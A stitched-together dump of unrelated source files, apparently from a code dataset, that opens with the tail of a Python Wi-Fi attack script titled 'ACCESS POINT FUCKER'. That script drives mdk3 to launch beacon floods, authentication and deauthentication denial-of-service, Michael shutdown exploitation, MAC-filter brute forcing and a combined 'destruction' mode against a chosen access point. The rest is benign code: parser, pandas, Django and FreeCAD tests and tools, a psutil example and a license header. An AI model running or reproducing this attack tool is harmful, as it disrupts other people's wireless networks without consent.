stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
except KeyboardInterrupt:
clean_exit()
### MAIN APP
try:
import psyco
psyco.full()
except ImportError:
pass
attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt = []
if getoutput("whoami") != "root":
print("This script must be run as root !")
sysexit(0)
try:
system("clear")
print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
print("""Choose your Mode:
\t - (B)eacon flood
\t - (A)uth DoS
\t - (W)ids confusion
\t - (D)isassociation 'AmoK Mode'
\t - (M)ichael shutdown exploitation
\t - MA(C) Filter Brute-Forcer
\t - Des(T)ruction mode (USE WITH CAUTION)\n""")
## GET MODE
while 1:
mode = raw_input("\n>>> ")
if mode.upper() not in attackAvail:
print(" '%s' is not a valid mode !" % mode)
else:
break
## GET INTERFACE
while 1:
iface = raw_input("\nMonitor interface to use: ")
if check_mon(iface):
attack_opt.append(iface)
break
else:
print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
## GET ESSID
if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
else:
attack_opt.append(None)
## GET BSSID
if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
while 1:
bssid = raw_input("\nTarget BSSID: ")
if check_mac(bssid):
attack_opt.append(bssid)
break
else:
print("Invalid BSSID, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## GET CHANNEL
if mode.upper() != "C":
while 1:
channel = raw_input("\nTarget channel: ")
if check_chan(iface, channel):
attack_opt.append(channel)
break
else:
print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## LAUNCH SELECTED ATTACK
if path.exists("apfucker.log"):
remove("apfucker.log")
if mode.upper() != "T":
system('clear')
Mdk3(mode.upper(), attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
else:
system('clear')
print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
print(" You've choosen DESTRUCTION MODE")
print(" Using this mode may harm your WiFi card, use it at your own risks.")
validate = raw_input(" Do you wish to continue? (y/N): ")
if validate.upper() != "Y":
print(" Ok, exiting now")
sysexit(0)
else:
out = open("apfucker.log","a")
out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
out.close()
print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
print(" Please be kind with your neighbours xD")
##wids not implemented: may raise segfault
##appears to be an internal mdk3 issue when running multiple attacks
for atk in ("B", "A", "D", "M"):
Mdk3(atk, attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
clean_exit()
| mit | -1,530,642,497,631,623,200 | 33.206642 | 163 | 0.547033 | false |
igordejanovic/parglare | tests/func/grammar/test_grammar.py | 1 | 10211 | # -*- coding: utf-8 -*-
import pytest
from parglare import Parser, Grammar
from parglare.grammar import ASSOC_LEFT, ASSOC_RIGHT, DEFAULT_PRIORITY
from parglare.exceptions import GrammarError, ParseError
def test_single_terminal():
"""
Test that grammar may be just a single terminal.
"""
grammar = r"""
S: A;
terminals
A: "a";
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('a')
assert result == 'a'
grammar = r"""
S: A;
terminals
A: /\d+/;
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('23')
assert result == '23'
def test_undefined_grammar_symbol():
"Tests that undefined grammar symbols raises errors."
grammar = """
S: A B;
A: "a" | B;
B: id;
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Unknown symbol' in str(e.value)
assert 'id' in str(e.value)
def test_multiple_terminal_definition():
grammar = """
S: A A;
terminals
A: "a";
A: "b";
"""
with pytest.raises(GrammarError,
match=r'.*Multiple definitions of terminal rule.*'):
Grammar.from_string(grammar)
def test_reserved_symbol_names():
"""
Test that reserved symbol names can't be used.
"""
grammar = """
S: STOP "First";
STOP: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
grammar = """
S: EMPTY "First";
EMPTY: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
def test_assoc_prior():
"""Test that associativity and priority can be defined for productions and
terminals.
"""
grammar = r"""
E: E '+' E {left, 1};
E: E '*' E {2, left};
E: E '^' E {right};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
# Repeat the same but for alternative keywords "shift" and "reduce"
grammar = r"""
E: E '+' E {reduce, 1};
E: E '*' E {2, reduce};
E: E '^' E {shift};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
def test_terminal_priority():
"Terminals might define priority which is used for lexical disambiguation."
grammar = """
S: A | B;
A: 'a' {15};
B: 'b';
"""
g = Grammar.from_string(grammar)
for t in g.terminals.values():
if t.name == 'A':
assert t.prior == 15
else:
assert t.prior == DEFAULT_PRIORITY
def test_no_terminal_associativity():
"Tests that terminals can't have associativity defined."
grammar = """
S: A | B;
terminals
A: 'a' {15, left};
B: 'b';
"""
with pytest.raises(ParseError) as e:
Grammar.from_string(grammar)
assert 'Expected: : but found <NotComment(};)> or <}(})>' \
in str(e.value)
def test_terminal_empty_body():
"""
Test that terminals may have empty bodies (when defined using
recognizers)
"""
grammar = """
S: A | B;
terminals
A: {15};
B: ;
"""
g = Grammar.from_string(grammar, recognizers={'B': None, 'A': None})
a = g.get_terminal('A')
assert a.prior == 15
b = g.get_terminal('B')
assert b.recognizer is None
def test_terminal_regexp_with_backslash():
"""Regexp terminals can contain (escaped) backslash."""
grammar = Grammar.from_string(r"""
start: t1 t2;
terminals
t1: /\\/;
t2: /a/;
""")
t1 = grammar.get_terminal('t1')
assert t1.recognizer._regex == '\\\\'
assert t1.recognizer('\\', 0) == '\\'
def test_builtin_grammar_action():
"""
Builtin actions can be referenced from a grammar.
"""
grammar = """
@collect
Ones: Ones One | One;
terminals
One: "1";
"""
g = Grammar.from_string(grammar)
ones = g.get_nonterminal('Ones')
from parglare.actions import collect
assert ones.action == collect
p = Parser(g)
result = p.parse('1 1 1 1 1')
assert result == "1 1 1 1 1".split()
def test_multiple_grammar_action_raises_error():
"""
If multiple actions are given for the same non-terminal GrammarError
should be raised.
"""
grammar = """
S: Ones;
@collect
Ones: Ones One | One;
@something
Ones: 'foo';
terminals
One: "1";
"""
# Actions 'collect' and 'something' defined for rule 'Ones'
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Multiple' in str(e.value)
def test_action_override():
"""
Explicitly provided action in `actions` param overrides default or
grammar provided.
"""
grammar = """
S: Foo Bar;
@pass_nochange
Bar: "1" a;
terminals
@pass_nochange
Foo: 'foo';
a: "a";
"""
g = Grammar.from_string(grammar)
p = Parser(g)
input_str = "foo 1 a"
result = p.parse(input_str)
assert result == ["foo", ["1", "a"]]
actions = {
"Foo": lambda _, __: "eggs",
"Bar": lambda _, __: "bar reduce"}
p = Parser(g, actions=actions)
result = p.parse(input_str)
assert result == ["eggs", "bar reduce"]
# Test with actions call postponing
p = Parser(g, build_tree=True, actions=actions)
tree = p.parse(input_str)
result = p.call_actions(tree)
assert result == ["eggs", "bar reduce"]
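# Helper: check whether the productions of `symbol_name` in `prods` carry an assignment named `assgn_name`.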
def assignment_in_productions(prods, symbol_name, assgn_name):
found = False
for p in prods:
if p.symbol.name == symbol_name:
found = assgn_name in p.assignments
return found
def test_assignment_plain():
"""
Test plain assignment.
"""
grammar = """
S: "1" first=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == "2"
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_bool():
"""
Test bool assignment.
"""
grammar = """
S: "1" first?=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_of_repetition():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+ "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_assignment_of_repetition_with_sep():
"""
Test assignment of repetition with separator.
"""
grammar = """
S: "1" first=some_match+[comma] "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_multiple_assignment_with_repetitions():
"""
Test multiple assignments combined with repetitions.
"""
grammar = """
S: "1" first=some_match+[comma] second?=some_match* "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
assert assignment_in_productions(g.productions, 'S', 'second')
called = [False]
def act_s(_, nodes, first, second):
called[0] = True
assert first == ["2", "2"]
assert second is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 2 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], ["2", "2", "2"], "3"]
assert called[0]
def test_case_insensitive_parsing():
"""
By default parglare is case sensitive. This tests parsing without case
sensitivity.
"""
grammar = r"""
S: "one" "Two" Astart;
terminals
Astart: /Aa\w+/;
"""
g = Grammar.from_string(grammar)
# By default parsing is case sensitive for both string and regex matches.
parser = Parser(g)
with pytest.raises(ParseError):
parser.parse('One Two Aaa')
with pytest.raises(ParseError):
parser.parse('one Two AAa')
g = Grammar.from_string(grammar, ignore_case=True)
parser = Parser(g)
parser.parse('One Two Aaa')
parser.parse('one Two AAa')
| mit | -8,498,248,226,509,463,000 | 19.711968 | 79 | 0.565958 | false |
DGrady/pandas | pandas/tests/computation/test_compat.py | 11 | 1308 | import pytest
from distutils.version import LooseVersion
import pandas as pd
from pandas.core.computation.engines import _engines
import pandas.core.computation.expr as expr
from pandas.core.computation import _MIN_NUMEXPR_VERSION
def test_compat():
# test we have compat with our version of numexpr
from pandas.core.computation import _NUMEXPR_INSTALLED
try:
import numexpr as ne
ver = ne.__version__
if ver < LooseVersion(_MIN_NUMEXPR_VERSION):
assert not _NUMEXPR_INSTALLED
else:
assert _NUMEXPR_INSTALLED
except ImportError:
pytest.skip("not testing numexpr version compat")
@pytest.mark.parametrize('engine', _engines)
@pytest.mark.parametrize('parser', expr._parsers)
def test_invalid_numexpr_version(engine, parser):
def testit():
a, b = 1, 2 # noqa
res = pd.eval('a + b', engine=engine, parser=parser)
assert res == 3
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
pytest.skip("no numexpr")
else:
if ne.__version__ < LooseVersion(_MIN_NUMEXPR_VERSION):
with pytest.raises(ImportError):
testit()
else:
testit()
else:
testit()
| bsd-3-clause | 7,998,924,532,500,616,000 | 27.434783 | 67 | 0.616208 | false |
lunixbochs/fs-uae-gles | launcher/fs_uae_launcher/fsui/wx/choice.py | 1 | 1037 | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
from .common import update_class
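# Thin fsui wrapper around wx.Choice: pre-selects the first item and forwards wx selection events to on_change().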
class Choice(wx.Choice):
def __init__(self, parent, items=[]):
wx.Choice.__init__(self, parent.get_container(), -1,
wx.DefaultPosition, wx.DefaultSize, items)
if len(items) > 0:
self.SetSelection(0)
self.Bind(wx.EVT_CHOICE, self.__choice_event)
def get_min_width(self):
return self.GetBestSize()[0]
def get_min_height(self):
return self.GetBestSize()[1]
def set_position(self, position):
self.SetPosition(position)
def set_size(self, size):
self.SetSize(size)
def get_index(self):
return self.GetSelection()
def set_index(self, index):
self.SetSelection(index)
def on_change(self):
print("Choice.on_change")
def __choice_event(self, event):
self.on_change()
update_class(Choice)
| gpl-2.0 | -8,796,235,951,678,419,000 | 23.292683 | 60 | 0.59595 | false |
YuanYouYuan/FreeCAD | src/Tools/MakeAppTools.py | 32 | 2611 | import os, sys, re, string, FCFileTools
verbose = 0
dcount = fcount = 0
def replaceTemplate(dirName, oldName, newName):
"""
modify contents from dirName and below, replace oldName by newName
"""
for file in os.listdir(dirName):
pathName = os.path.join(dirName, file)
if not os.path.isdir(pathName):
try:
print pathName
origFile = open(pathName) # open file
lines = origFile.readlines() # read the file...
origFile.close() # ... and close it
output = open(pathName,"w") # open the file again
for line in lines:
if (string.find(line, oldName) != -1): # search for 'oldName' and replace it
line = string.replace(line, oldName, newName)
output.write(line) # write the modified line back
output.close()  # close the file
except:
print 'Error modifying', pathName, '--skipped'
print sys.exc_type, sys.exc_value
else:
try:
replaceTemplate(pathName, oldName, newName)
except:
print 'Error changing to directory', pathName, '--skipped'
print sys.exc_type, sys.exc_value
def copyTemplate(dirFrom, dirTo, oldName, newName, MatchFile, MatchDir):
"""
copy contents of dirFrom and below to dirTo
"""
global dcount, fcount
for file in os.listdir(dirFrom): # for files/dirs here
print file
pathFrom = os.path.join(dirFrom, file)
pathTo = os.path.join(dirTo, file) # extend both paths
if (string.find(pathTo, oldName) != -1):
pathTo = string.replace(pathTo, oldName, newName) # rename file if 'oldName' is found
if not os.path.isdir(pathFrom): # copy simple files
hit = 0
for matchpat in MatchFile:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore file '+file
continue
try:
if verbose > 1: print 'copying', pathFrom, 'to', pathTo
FCFileTools.cpfile(pathFrom, pathTo)
fcount = fcount+1
except:
print 'Error copying', pathFrom, 'to', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
else:
hit = 0
for matchpat in MatchDir:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore directory '+file
continue
if verbose: print 'copying dir', pathFrom, 'to', pathTo
try:
os.mkdir(pathTo) # make new subdir
copyTemplate(pathFrom, pathTo, oldName, newName, MatchFile, MatchDir) # recur into subdirs
dcount = dcount+1
except:
print 'Error creating', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
| lgpl-2.1 | -2,565,172,866,029,309,400 | 31.909091 | 96 | 0.623516 | false |
synasius/django | tests/null_queries/tests.py | 36 | 2939 | from __future__ import unicode_literals
from django.core.exceptions import FieldError
from django.test import TestCase
from .models import Choice, Inner, OuterA, OuterB, Poll
class NullQueriesTests(TestCase):
def test_none_as_null(self):
"""
Regression test for the use of None as a query value.
None is interpreted as an SQL NULL, but only in __exact and __iexact
queries.
Set up some initial polls and choices
"""
p1 = Poll(question='Why?')
p1.save()
c1 = Choice(poll=p1, choice='Because.')
c1.save()
c2 = Choice(poll=p1, choice='Why Not?')
c2.save()
# Exact query with value None returns nothing ("is NULL" in sql,
# but every 'id' field has a value).
self.assertQuerysetEqual(Choice.objects.filter(choice__exact=None), [])
# The same behavior for iexact query.
self.assertQuerysetEqual(Choice.objects.filter(choice__iexact=None), [])
# Excluding the previous result returns everything.
self.assertQuerysetEqual(
Choice.objects.exclude(choice=None).order_by('id'),
[
'<Choice: Choice: Because. in poll Q: Why? >',
'<Choice: Choice: Why Not? in poll Q: Why? >'
]
)
# Valid query, but fails because foo isn't a keyword
self.assertRaises(FieldError, Choice.objects.filter, foo__exact=None)
# Can't use None on anything other than __exact and __iexact
self.assertRaises(ValueError, Choice.objects.filter, id__gt=None)
# Related managers use __exact=None implicitly if the object hasn't been saved.
p2 = Poll(question="How?")
self.assertEqual(repr(p2.choice_set.all()), '<QuerySet []>')
def test_reverse_relations(self):
"""
Querying across reverse relations and then another relation should
insert outer joins correctly so as not to exclude results.
"""
obj = OuterA.objects.create()
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third=None),
['<OuterA: OuterA object>']
)
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third__data=None),
['<OuterA: OuterA object>']
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
Inner.objects.filter(first__inner__third=None),
['<Inner: Inner object>']
)
# Ticket #13815: check if <reverse>_isnull=False does not produce
# faulty empty lists
OuterB.objects.create(data="reverse")
self.assertQuerysetEqual(
OuterB.objects.filter(inner__isnull=False),
[]
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
OuterB.objects.exclude(inner__isnull=False),
['<OuterB: OuterB object>']
)
| bsd-3-clause | -9,054,589,427,036,456,000 | 33.988095 | 87 | 0.601905 | false |
chen0031/Dato-Core | src/unity/python_deps/psutil/examples/pmap.py | 43 | 1983 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of 'pmap' utility on Linux, 'vmmap' on OSX and 'procstat -v' on BSD.
Report memory map of a process.
$ python examples/pmap.py 32402
pid=32402, name=hg
Address RSS Mode Mapping
0000000000400000 1200K r-xp /usr/bin/python2.7
0000000000838000 4K r--p /usr/bin/python2.7
0000000000839000 304K rw-p /usr/bin/python2.7
00000000008ae000 68K rw-p [anon]
000000000275e000 5396K rw-p [heap]
00002b29bb1e0000 124K r-xp /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb203000 8K rw-p [anon]
00002b29bb220000 528K rw-p [anon]
00002b29bb2d8000 768K rw-p [anon]
00002b29bb402000 4K r--p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb403000 8K rw-p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb405000 60K r-xp /lib/x86_64-linux-gnu/libpthread-2.17.so
00002b29bb41d000 0K ---p /lib/x86_64-linux-gnu/libpthread-2.17.so
00007fff94be6000 48K rw-p [stack]
00007fff94dd1000 4K r-xp [vdso]
ffffffffff600000 0K r-xp [vsyscall]
...
"""
import sys
import psutil
from psutil._compat import print_
def main():
if len(sys.argv) != 2:
sys.exit('usage: pmap <pid>')
p = psutil.Process(int(sys.argv[1]))
print_("pid=%s, name=%s" % (p.pid, p.name()))
templ = "%-16s %10s %-7s %s"
print_(templ % ("Address", "RSS", "Mode", "Mapping"))
total_rss = 0
for m in p.memory_maps(grouped=False):
total_rss += m.rss
print_(templ % (
m.addr.split('-')[0].zfill(16),
str(m.rss / 1024) + 'K',
m.perms,
m.path))
print_("-" * 33)
print_(templ % ("Total", str(total_rss / 1024) + 'K', '', ''))
if __name__ == '__main__':
main()
| agpl-3.0 | -2,561,654,710,117,017,600 | 33.189655 | 77 | 0.589007 | false |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/contrib/gis/db/backends/oracle/operations.py | 18 | 10848 | """
This module contains the spatial lookup types, and the `get_geo_where_clause`
routine for Oracle Spatial.
Please note that WKT support is broken on the XE version, and thus
this backend will not work on such platforms. Specifically, XE lacks
support for an internal JVM, and Java libraries are required to use
the WKT constructors.
"""
import re
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.oracle.adapter import OracleSpatialAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import aggregates
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.db.backends.oracle.operations import DatabaseOperations
from django.utils import six
from django.utils.functional import cached_property
DEFAULT_TOLERANCE = '0.05'
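# The operator classes below render spatial lookups as Oracle SDO_* function
# calls; most compare the function result against the string 'TRUE'.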
class SDOOperator(SpatialOperator):
sql_template = "%(func)s(%(lhs)s, %(rhs)s) = 'TRUE'"
class SDODistance(SpatialOperator):
sql_template = "SDO_GEOM.SDO_DISTANCE(%%(lhs)s, %%(rhs)s, %s) %%(op)s %%(value)s" % DEFAULT_TOLERANCE
class SDODWithin(SpatialOperator):
sql_template = "SDO_WITHIN_DISTANCE(%(lhs)s, %(rhs)s, %%s) = 'TRUE'"
class SDODisjoint(SpatialOperator):
sql_template = "SDO_GEOM.RELATE(%%(lhs)s, 'DISJOINT', %%(rhs)s, %s) = 'DISJOINT'" % DEFAULT_TOLERANCE
class SDORelate(SpatialOperator):
sql_template = "SDO_RELATE(%(lhs)s, %(rhs)s, 'mask=%(mask)s') = 'TRUE'"
def check_relate_argument(self, arg):
masks = 'TOUCH|OVERLAPBDYDISJOINT|OVERLAPBDYINTERSECT|EQUAL|INSIDE|COVEREDBY|CONTAINS|COVERS|ANYINTERACT|ON'
mask_regex = re.compile(r'^(%s)(\+(%s))*$' % (masks, masks), re.I)
if not isinstance(arg, six.string_types) or not mask_regex.match(arg):
raise ValueError('Invalid SDO_RELATE mask: "%s"' % arg)
def as_sql(self, connection, lookup, template_params, sql_params):
template_params['mask'] = sql_params.pop()
return super(SDORelate, self).as_sql(connection, lookup, template_params, sql_params)
class SDOIsValid(SpatialOperator):
sql_template = "%%(func)s(%%(lhs)s, %s) = 'TRUE'" % DEFAULT_TOLERANCE
class OracleOperations(BaseSpatialOperations, DatabaseOperations):
name = 'oracle'
oracle = True
disallowed_aggregates = (aggregates.Collect, aggregates.Extent3D, aggregates.MakeLine)
Adapter = OracleSpatialAdapter
area = 'SDO_GEOM.SDO_AREA'
gml = 'SDO_UTIL.TO_GMLGEOMETRY'
centroid = 'SDO_GEOM.SDO_CENTROID'
difference = 'SDO_GEOM.SDO_DIFFERENCE'
distance = 'SDO_GEOM.SDO_DISTANCE'
extent = 'SDO_AGGR_MBR'
intersection = 'SDO_GEOM.SDO_INTERSECTION'
length = 'SDO_GEOM.SDO_LENGTH'
num_points = 'SDO_UTIL.GETNUMVERTICES'
perimeter = length
point_on_surface = 'SDO_GEOM.SDO_POINTONSURFACE'
reverse = 'SDO_UTIL.REVERSE_LINESTRING'
sym_difference = 'SDO_GEOM.SDO_XOR'
transform = 'SDO_CS.TRANSFORM'
union = 'SDO_GEOM.SDO_UNION'
unionagg = 'SDO_AGGR_UNION'
from_text = 'SDO_GEOMETRY'
function_names = {
'Area': 'SDO_GEOM.SDO_AREA',
'BoundingCircle': 'SDO_GEOM.SDO_MBC',
'Centroid': 'SDO_GEOM.SDO_CENTROID',
'Difference': 'SDO_GEOM.SDO_DIFFERENCE',
'Distance': 'SDO_GEOM.SDO_DISTANCE',
'Intersection': 'SDO_GEOM.SDO_INTERSECTION',
'IsValid': 'SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT',
'Length': 'SDO_GEOM.SDO_LENGTH',
'NumGeometries': 'SDO_UTIL.GETNUMELEM',
'NumPoints': 'SDO_UTIL.GETNUMVERTICES',
'Perimeter': 'SDO_GEOM.SDO_LENGTH',
'PointOnSurface': 'SDO_GEOM.SDO_POINTONSURFACE',
'Reverse': 'SDO_UTIL.REVERSE_LINESTRING',
'SymDifference': 'SDO_GEOM.SDO_XOR',
'Transform': 'SDO_CS.TRANSFORM',
'Union': 'SDO_GEOM.SDO_UNION',
}
# We want to get SDO Geometries as WKT because it is much easier to
# instantiate GEOS proxies from WKT than SDO_GEOMETRY(...) strings.
# However, this adversely affects performance (i.e., Java is called
# to convert to WKT on every query). If someone wishes to write a
# SDO_GEOMETRY(...) parser in Python, let me know =)
select = 'SDO_UTIL.TO_WKTGEOMETRY(%s)'
gis_operators = {
'contains': SDOOperator(func='SDO_CONTAINS'),
'coveredby': SDOOperator(func='SDO_COVEREDBY'),
'covers': SDOOperator(func='SDO_COVERS'),
'disjoint': SDODisjoint(),
'intersects': SDOOperator(func='SDO_OVERLAPBDYINTERSECT'), # TODO: Is this really the same as ST_Intersects()?
'isvalid': SDOIsValid(func='SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT'),
'equals': SDOOperator(func='SDO_EQUAL'),
'exact': SDOOperator(func='SDO_EQUAL'),
'overlaps': SDOOperator(func='SDO_OVERLAPS'),
'same_as': SDOOperator(func='SDO_EQUAL'),
'relate': SDORelate(), # Oracle uses a different syntax, e.g., 'mask=inside+touch'
'touches': SDOOperator(func='SDO_TOUCH'),
'within': SDOOperator(func='SDO_INSIDE'),
'distance_gt': SDODistance(op='>'),
'distance_gte': SDODistance(op='>='),
'distance_lt': SDODistance(op='<'),
'distance_lte': SDODistance(op='<='),
'dwithin': SDODWithin(),
}
truncate_params = {'relate': None}
@cached_property
def unsupported_functions(self):
unsupported = {
'AsGeoJSON', 'AsKML', 'AsSVG', 'Envelope', 'ForceRHR', 'GeoHash',
'MakeValid', 'MemSize', 'Scale', 'SnapToGrid', 'Translate',
}
if self.connection.oracle_full_version < '12.1.0.2':
unsupported.add('BoundingCircle')
return unsupported
def geo_quote_name(self, name):
return super(OracleOperations, self).geo_quote_name(name).upper()
def get_db_converters(self, expression):
converters = super(OracleOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
geometry_fields = (
'PointField', 'GeometryField', 'LineStringField',
'PolygonField', 'MultiPointField', 'MultiLineStringField',
'MultiPolygonField', 'GeometryCollectionField', 'GeomField',
'GMLField',
)
if internal_type in geometry_fields:
converters.append(self.convert_textfield_value)
if hasattr(expression.output_field, 'geom_type'):
converters.append(self.convert_geometry)
return converters
def convert_geometry(self, value, expression, connection, context):
if value:
value = Geometry(value)
if 'transformed_srid' in context:
value.srid = context['transformed_srid']
return value
def convert_extent(self, clob, srid):
if clob:
# Generally, Oracle returns a polygon for the extent -- however,
# it can return a single point if there's only one Point in the
# table.
ext_geom = Geometry(clob.read(), srid)
gtype = str(ext_geom.geom_type)
if gtype == 'Polygon':
# Construct the 4-tuple from the coordinates in the polygon.
shell = ext_geom.shell
ll, ur = shell[0][:2], shell[2][:2]
elif gtype == 'Point':
ll = ext_geom.coords[:2]
ur = ll
else:
raise Exception('Unexpected geometry type returned for extent: %s' % gtype)
xmin, ymin = ll
xmax, ymax = ur
return (xmin, ymin, xmax, ymax)
else:
return None
def geo_db_type(self, f):
"""
Returns the geometry database type for Oracle. Unlike other spatial
backends, no stored procedure is necessary and it's the same for all
geometry types.
"""
return 'MDSYS.SDO_GEOMETRY'
def get_distance(self, f, value, lookup_type, **kwargs):
"""
Returns the distance parameters given the value and the lookup type.
On Oracle, geometry columns with a geodetic coordinate system behave
implicitly like a geography column, and thus meters will be used as
the distance parameter on them.
"""
if not value:
return []
value = value[0]
if isinstance(value, Distance):
if f.geodetic(self.connection):
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
dist_param = value
# dwithin lookups on Oracle require a special string parameter
# that starts with "distance=".
if lookup_type == 'dwithin':
dist_param = 'distance=%s' % dist_param
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
SDO_CS.TRANSFORM() function call.
"""
if value is None:
return 'NULL'
def transform_value(val, srid):
return val.srid != srid
if hasattr(value, 'as_sql'):
if transform_value(value, f.srid):
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
else:
placeholder = '%s'
# No geometry value used for F expression, substitute in
# the column name instead.
sql, _ = compiler.compile(value)
return placeholder % sql
else:
if transform_value(value, f.srid):
return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (self.transform, value.srid, f.srid)
else:
return 'SDO_GEOMETRY(%%s, %s)' % f.srid
def spatial_aggregate_name(self, agg_name):
"""
Returns the spatial aggregate SQL name.
"""
agg_name = 'unionagg' if agg_name.lower() == 'union' else agg_name.lower()
return getattr(self, agg_name)
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
from django.contrib.gis.db.backends.oracle.models import OracleGeometryColumns
return OracleGeometryColumns
def spatial_ref_sys(self):
from django.contrib.gis.db.backends.oracle.models import OracleSpatialRefSys
return OracleSpatialRefSys
def modify_insert_params(self, placeholder, params):
"""Drop out insert parameters for NULL placeholder. Needed for Oracle Spatial
backend due to #10888.
"""
if placeholder == 'NULL':
return []
return super(OracleOperations, self).modify_insert_params(placeholder, params)
| apache-2.0 | 872,274,038,253,494,000 | 38.447273 | 119 | 0.626383 | false |
lukeiwanski/tensorflow | tensorflow/contrib/cluster_resolver/python/training/gce_cluster_resolver.py | 24 | 5151 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
